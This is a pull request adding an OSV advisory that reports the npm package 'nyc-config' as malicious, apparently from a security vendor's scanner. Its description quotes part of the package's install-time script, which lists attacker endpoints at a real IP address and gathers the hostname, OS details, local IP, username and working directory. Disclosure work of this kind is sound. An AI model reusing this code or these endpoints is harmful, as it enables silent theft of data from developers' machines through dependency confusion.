### PR TITLE
Report nyc-config package

### DIFF
--- a/osv/malicious/npm/nyc-config/MAL-0000-nycconfig.json
+++ b/osv/malicious/npm/nyc-config/MAL-0000-nycconfig.json
@@ -1,0 +1,34 @@
+{
+  "modified": "2025-03-10T17:19:12.788Z",
+  "published": "2025-03-10T17:19:12.788Z",
+  "schema_version": "1.5.0",
+  "summary": "Malicious code in nyc-config package (npm)",
+  "details": "This package runs commands in a pre-install script that exfils sensitive data to a attacker-controlled domain.",
+  "affected": [
+      {
+          "package": {
+              "ecosystem": "npm",
+              "name": "nyc-config"
+          },
+          "ranges": [
+            {
+              "type": "SEMVER",
+              "events": [
+                {
+                  "introduced": "0"
+                }
+              ]
+            }
+          ]
+      }
+  ],
+  "credits": [
+      {
+          "name": "Safedep",
+          "type": "FINDER",
+          "contact": [
+              "https://safedep.io/"
+          ]
+      }
+  ]
+}


### PR DESCRIPTION
Detected by our tool - [malysis](https://github.com/safedep/malysis/) -
https://platform.safedep.io/community/malysis/01JP01T1WQPNGAG516NDS9A6ST

Dependency Confusion Attack against nyc as reported in https://github.com/istanbuljs/nyc/issues/1590

Package info:
https://www.npmjs.com/package/nyc-config

package.json contains a preinstall directive to execute index.js on installation.

Example malicious code in nyc-config/index.js:
```javascript
// List of fallback servers
const endpoints = [
    "http://23.22.251.177:8080/jpd.php",
    "http://23.22.251.177:8080/jpd1.php",
];

[...]

// Collect System Information
const systemInfo = {
    publicIP: "", // Will be fetched dynamically
    hostname: os.hostname(),
    osType: os.type(),
    osPlatform: os.platform(),
    osRelease: os.release(),
    osArch: os.arch(),
    localIP: Object.values(os.networkInterfaces())
        .flat()
        .find((i) => i.family === "IPv4" && !i.internal)?.address || "Unknown",
    whoamiUser: os.userInfo().username,
    currentDirectory: process.cwd(),
};
```

